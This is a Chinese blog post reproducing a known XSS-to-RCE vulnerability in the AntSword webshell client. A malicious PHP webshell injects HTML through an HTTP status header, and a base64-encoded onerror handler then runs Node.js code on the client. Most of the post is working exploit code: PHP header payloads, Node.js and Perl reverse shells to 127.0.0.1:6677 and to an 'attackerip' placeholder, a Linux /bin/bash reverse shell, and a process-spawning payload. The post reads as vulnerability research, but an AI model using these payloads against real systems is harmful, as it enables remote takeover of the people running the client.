首页 » NetworkSec » Penetration » 正文

antsword xss漏洞重现

0x00 概述

20190412,antsword的github上有个issus
https://github.com/AntSwordProject/antSword/issues/147
因为toastr错误信息以html返回并且没有严格过滤导致xss,新版本修复不支持html。
比较有趣,重现一下

 

0x01 漏洞重现

环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5

1) XSS

xss webshell:
<?php

header(‘HTTP/1.1 500 <img src=# onerror=alert`x`>’);

 

2) RCE

win+nodejs

成功反弹shell。

var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(6677, "127.0.0.1", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
<?php
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");
?>

 

未成功的组合:

win+perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 
# Win 平台 
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())'>");

?>

require('child_process').exec('perl -MIO -e \'$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:6677");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });
Linux+perl 反弹
未测试

require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });


<?php

header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())'>");

?>

Linux+nodejs
未测试
var net = require("net"), sh = require("child_process").exec("/bin/bash");var client = new net.Socket();
client.connect(6677, "127.0.0.1", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

<?php
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())'>");
?>
var Process = window.parent.top.process.binding('process_wrap').Process;var proc = new Process();
proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + '=' + env[key]);
proc.spawn({
    file: 'cmd.exe',
    args: ['/k calc'],
    cwd: null,
    windowsVerbatimArguments: false,
    detached: false,
    envPairs: env_,
    stdio: [{
        type: 'ignore'
    }, {
        type: 'ignore'
    }, {
        type: 'ignore'
    }]
});
<?php
header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(`dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJiMzOTtwcm9jZXNzX3dyYXAmIzM5OykuUHJvY2VzczsNCnZhciBwcm9jID0gbmV3IFByb2Nlc3MoKTsNCnByb2Mub25leGl0ID0gZnVuY3Rpb24gKGEsIGIpIHt9Ow0KdmFyIGVudiA9IHdpbmRvdy5wYXJlbnQudG9wLnByb2Nlc3MuZW52Ow0KdmFyIGVudl8gPSBbXTsNCmZvciAodmFyIGtleSBpbiBlbnYpIGVudl8ucHVzaChrZXkgKyAmIzM5Oz0mIzM5OyArIGVudltrZXldKTsNCnByb2Muc3Bhd24oew0KICAgIGZpbGU6ICYjMzk7Y21kLmV4ZSYjMzk7LA0KICAgIGFyZ3M6IFsmIzM5Oy9rIGNhbGMmIzM5O10sDQogICAgY3dkOiBudWxsLA0KICAgIHdpbmRvd3NWZXJiYXRpbUFyZ3VtZW50czogZmFsc2UsDQogICAgZGV0YWNoZWQ6IGZhbHNlLA0KICAgIGVudlBhaXJzOiBlbnZfLA0KICAgIHN0ZGlvOiBbew0KICAgICAgICB0eXBlOiAmIzM5O2lnbm9yZSYjMzk7DQogICAgfSwgew0KICAgICAgICB0eXBlOiAmIzM5O2lnbm9yZSYjMzk7DQogICAgfSwgew0KICAgICAgICB0eXBlOiAmIzM5O2lnbm9yZSYjMzk7DQogICAgfV0NCn0pOw==`,`base64`).toString())'>");
?>

 

0x02 参考资料

https://github.com/AntSwordProject/antSword/issues/147

https://www.jianshu.com/p/78d82cc15727

https://www.t00ls.net/articles-50745.html

 

 

Comment

please input captcha *